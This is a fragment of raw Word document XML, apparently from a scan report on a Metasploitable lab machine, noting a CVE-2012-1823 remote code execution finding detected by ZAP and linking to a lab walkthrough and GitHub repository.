                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId78"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5734812" cy="2313432"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E254970" w14:textId="0781446A" w:rsidR="002F5473" w:rsidRPr="00460C48" w:rsidRDefault="00F05F95" w:rsidP="00F05F95">
      <w:r>
        <w:t xml:space="preserve">Remote Code </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Execu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on - CVE-2012-1823 details of which have been detailed in this document and detected by zap.  A full GVM report is available to download in the same repo as this document.   </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="002F5473" w:rsidRPr="00460C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2388"/>
    <w:rsid w:val="00050E8D"/>
    <w:rsid w:val="00062B58"/>
    <w:rsid w:val="000828E0"/>
    <w:rsid w:val="000F091D"/>
    <w:rsid w:val="00101BC7"/>
    <w:rsid w:val="0011222E"/>
    <w:rsid w:val="001124F8"/>
    <w:rsid w:val="00140FA3"/>
    <w:rsid w:val="001419EA"/>
    <w:rsid w:val="00142AB4"/>
    <w:rsid w:val="001563F3"/>
    <w:rsid w:val="001734D6"/>
    <w:rsid w:val="00190C6A"/>
    <w:rsid w:val="00195F62"/>
    <w:rsid w:val="001B0F39"/>
    <w:rsid w:val="001B7057"/>
    <w:rsid w:val="001E05FC"/>
    <w:rsid w:val="001E446A"/>
    <w:rsid w:val="001F694B"/>
    <w:rsid w:val="00204001"/>
    <w:rsid w:val="002415C7"/>
    <w:rsid w:val="00242AF9"/>
    <w:rsid w:val="00252A5D"/>
    <w:rsid w:val="00253760"/>
    <w:rsid w:val="00254EC9"/>
    <w:rsid w:val="0025562C"/>
    <w:rsid w:val="002678B2"/>
    <w:rsid w:val="002A63CB"/>
    <w:rsid w:val="002B73F5"/>
    <w:rsid w:val="002C41B1"/>
    <w:rsid w:val="002F07FC"/>
    <w:rsid w:val="002F5473"/>
    <w:rsid w:val="002F7A99"/>
    <w:rsid w:val="00313769"/>
    <w:rsid w:val="00321109"/>
    <w:rsid w:val="00384326"/>
    <w:rsid w:val="00393B96"/>
    <w:rsid w:val="003B2623"/>
    <w:rsid w:val="003B5EC8"/>
    <w:rsid w:val="003C24C7"/>
    <w:rsid w:val="00405ED6"/>
    <w:rsid w:val="00433EE2"/>
    <w:rsid w:val="004417A4"/>
    <w:rsid w:val="00460C48"/>
    <w:rsid w:val="00461B33"/>
    <w:rsid w:val="00495A6A"/>
    <w:rsid w:val="004B0430"/>
    <w:rsid w:val="004B637A"/>
    <w:rsid w:val="004D025B"/>
    <w:rsid w:val="004E6E8E"/>
    <w:rsid w:val="0052288E"/>
    <w:rsid w:val="005231AC"/>
    <w:rsid w:val="0053065B"/>
    <w:rsid w:val="00531359"/>
    <w:rsid w:val="005725A9"/>
    <w:rsid w:val="00580FC9"/>
    <w:rsid w:val="00594B23"/>
    <w:rsid w:val="005B2E1D"/>
    <w:rsid w:val="005F4C76"/>
    <w:rsid w:val="00607B81"/>
    <w:rsid w:val="00620BAC"/>
    <w:rsid w:val="006677D6"/>
    <w:rsid w:val="00681735"/>
    <w:rsid w:val="006A7485"/>
    <w:rsid w:val="006A7AF2"/>
    <w:rsid w:val="006C129D"/>
    <w:rsid w:val="006D5BFF"/>
    <w:rsid w:val="00734F0B"/>
    <w:rsid w:val="00741970"/>
    <w:rsid w:val="00742104"/>
    <w:rsid w:val="007739F9"/>
    <w:rsid w:val="007760B5"/>
    <w:rsid w:val="00792A92"/>
    <w:rsid w:val="007A110C"/>
    <w:rsid w:val="007A5D93"/>
    <w:rsid w:val="007B327D"/>
    <w:rsid w:val="007C44ED"/>
    <w:rsid w:val="007D2B9F"/>
    <w:rsid w:val="007E20E5"/>
    <w:rsid w:val="007F3821"/>
    <w:rsid w:val="007F7E46"/>
    <w:rsid w:val="0082504B"/>
    <w:rsid w:val="008314C5"/>
    <w:rsid w:val="00833660"/>
    <w:rsid w:val="00856C90"/>
    <w:rsid w:val="0088687B"/>
    <w:rsid w:val="0089054D"/>
    <w:rsid w:val="00894A1A"/>
    <w:rsid w:val="008B6AC2"/>
    <w:rsid w:val="008B6BEB"/>
    <w:rsid w:val="008B708C"/>
    <w:rsid w:val="008E1FB7"/>
    <w:rsid w:val="008E51FC"/>
    <w:rsid w:val="008F653F"/>
    <w:rsid w:val="009337A3"/>
    <w:rsid w:val="009337DE"/>
    <w:rsid w:val="00954F70"/>
    <w:rsid w:val="009973A1"/>
    <w:rsid w:val="009A0D15"/>
    <w:rsid w:val="009A65C2"/>
    <w:rsid w:val="009D555B"/>
    <w:rsid w:val="009E6717"/>
    <w:rsid w:val="009E78F3"/>
    <w:rsid w:val="009F2B48"/>
    <w:rsid w:val="00A0433A"/>
    <w:rsid w:val="00A52060"/>
    <w:rsid w:val="00A55419"/>
    <w:rsid w:val="00A70977"/>
    <w:rsid w:val="00A7228D"/>
    <w:rsid w:val="00A93DE3"/>
    <w:rsid w:val="00A94847"/>
    <w:rsid w:val="00AA7712"/>
    <w:rsid w:val="00AB4A6A"/>
    <w:rsid w:val="00AB69C6"/>
    <w:rsid w:val="00AE72C7"/>
    <w:rsid w:val="00AF1CC6"/>
    <w:rsid w:val="00AF4A33"/>
    <w:rsid w:val="00B33A9D"/>
    <w:rsid w:val="00B65EFC"/>
    <w:rsid w:val="00B867F4"/>
    <w:rsid w:val="00BA7D80"/>
    <w:rsid w:val="00BB5E2C"/>
    <w:rsid w:val="00BD308A"/>
    <w:rsid w:val="00BF2140"/>
    <w:rsid w:val="00BF414F"/>
    <w:rsid w:val="00C02EC4"/>
    <w:rsid w:val="00C107DA"/>
    <w:rsid w:val="00C2401A"/>
    <w:rsid w:val="00C4744C"/>
    <w:rsid w:val="00C90525"/>
    <w:rsid w:val="00CA1453"/>
    <w:rsid w:val="00D01E10"/>
    <w:rsid w:val="00D159D6"/>
    <w:rsid w:val="00D20B66"/>
    <w:rsid w:val="00D308AE"/>
    <w:rsid w:val="00D316B5"/>
    <w:rsid w:val="00D70A3E"/>
    <w:rsid w:val="00D76D9B"/>
    <w:rsid w:val="00D77F85"/>
    <w:rsid w:val="00D80D9B"/>
    <w:rsid w:val="00D93FF2"/>
    <w:rsid w:val="00DF50CE"/>
    <w:rsid w:val="00E01F34"/>
    <w:rsid w:val="00E05828"/>
    <w:rsid w:val="00E17435"/>
    <w:rsid w:val="00E40502"/>
    <w:rsid w:val="00E53903"/>
    <w:rsid w:val="00E54950"/>
    <w:rsid w:val="00E7387F"/>
    <w:rsid w:val="00EB3CAD"/>
    <w:rsid w:val="00ED0FA5"/>
    <w:rsid w:val="00ED1437"/>
    <w:rsid w:val="00EF6A43"/>
    <w:rsid w:val="00F05071"/>
    <w:rsid w:val="00F05F95"/>
    <w:rsid w:val="00F205D5"/>
    <w:rsid w:val="00F249B5"/>
    <w:rsid w:val="00F34884"/>
    <w:rsid w:val="00F42691"/>
    <w:rsid w:val="00F54D0B"/>
    <w:rsid w:val="00F85A44"/>
    <w:rsid w:val="00FA3977"/>
    <w:rsid w:val="00FB0980"/>
    <w:rsid w:val="00FB3914"/>
    <w:rsid w:val="00FB5467"/>
    <w:rsid w:val="00FC25AD"/>
    <w:rsid w:val="00FC27B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hyperlink" Target="https://resources.infosecinstitute.com/topics/capture-the-flag/metasploitable-1-walkthrough/" TargetMode="Externa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jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="web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hyperlink" Target="https://github.com/rich98/Metasploitable2"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28</Pages>
  <Words>1810</Words>
  <Characters>9845</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>358</Lines>
  <Paragraphs>231</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>11829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38</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-01-01T17:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-01T18:26:00Z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